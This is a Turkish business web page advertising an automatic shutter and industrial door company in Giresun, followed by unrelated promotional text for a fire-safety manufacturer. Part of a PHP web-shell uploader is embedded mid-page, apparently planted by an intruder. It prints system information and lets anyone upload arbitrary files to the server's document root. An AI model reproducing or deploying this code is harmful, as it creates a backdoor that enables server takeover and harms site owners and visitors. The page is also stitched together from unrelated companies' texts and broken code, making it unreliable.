Loading...

ELİT OTOMATİK KEPENK Firması Bulancak Giresun da Uzun yıllardır hizmetinize sunduğumuz profesyonel iş alanlarında, Müşterilerimize daha yakın olabilmek ve Servisteki kalitemizi ürünlere ve satışa yansıtma isteğimiz, karşılıklı memnuniyetimiz olsun. Üstün Kalite Anlayışıyla Endüstriyel Kapı Sistemleri, Fotoselli Kapı, Fotoselli Garaj Kapısı, Radarlı Kapı, Otomatik Kapı, Mantar Bariyer, Otomatik Kepenk, Garaj Kapısı, Fabrika Kapısı, Panjur, Bahçe Kapısı, Kollu Bariyer, Hızlı Tip Pvc Kapı, Yükleme Körüğü, Zincir Bariyer olarak kaliteden ödün vermeden çalışmaktayız.bunun yanısıra mevcut sistemlerin en iyi şekilde tamiri bakımı ve geliştirilmesi konusunda üstün gayret göstermekteyiz.Uzman personellerimiz ile her geçen gün kazanmış olduğumuz deneyim ve tecrübeyi müşteri portföyümüze yansıtmaya özen göstermiş,faaliyet gösterdiği alanlarda en uygun fiyat ve kaliteli üretim prensibini süratle hayata geçirmiştir. Müşteri memnuniyetini kendine prensinp edinen firmamız, vermiş olduğu satış sonrası hizmetleriylede bu memnuniyeti perçinlemektedir. Firmamızın çalışma prensibi ile beraber yürüttüğü yeni ürün araştırmaları ticari anlamda faaliyet gösteren müşterilerimize daha yeni ve daha kaliteli çözümler sağlayabilmektedir.  "; echo "".php_uname()."
"; echo "

"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses..!! -> $web/$files"; } else { echo "failed to upload in the document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>

Dünyanın hızla artan popülasyonu yaşam alanlarının da aynı hızla büyümesini sağlamaktadır. Dolayısıyla kontrol edilmesi güç bir büyümenin artan tehditleri beraberinde getirdiğınin farkındayız. Felaket önlem alınmadığı takdirde doğar. Eksel, yangın felaketini önlemek maksadıyla üreten, araştıran ve çözüm geliştiren olmayı kendine ilke edinmiştir.

Günümüz itfaiyesinin temelini oluşturan tulumbacı ocağı, yangın güvenlik sektöründe ilk sırayı almasına rağmen sektördekı Türk firmalarının uluslarası standartlarda üretim yapmakta geç kaldığını düşünmekteyız.

Üreten olarak, üretimi geliştiren olarak ve Türk markası olarak sadece kendi sınırlarımızda değil asya, orta doğu ve afrika’da birçok ülkede yangın güvenlik sektöründe çözüm sunmaktan ve tercih edilmekten gurur duyuyoruz.
Müşterilerimize kaliteli ve uygun çözüm sunmak,


Yangın güvenlik sektöründe ileri teknolojı üretmek ve geliştirmek,


İhraç ürünleri üreterek sınırlarımızı aşmak ve Türkiye ekonomisine katkı sağlamak.
images
1280
İşlem
images
4679
Mutlu Müşteri
images
3568
Çözüm
images
668
Çalışma Saati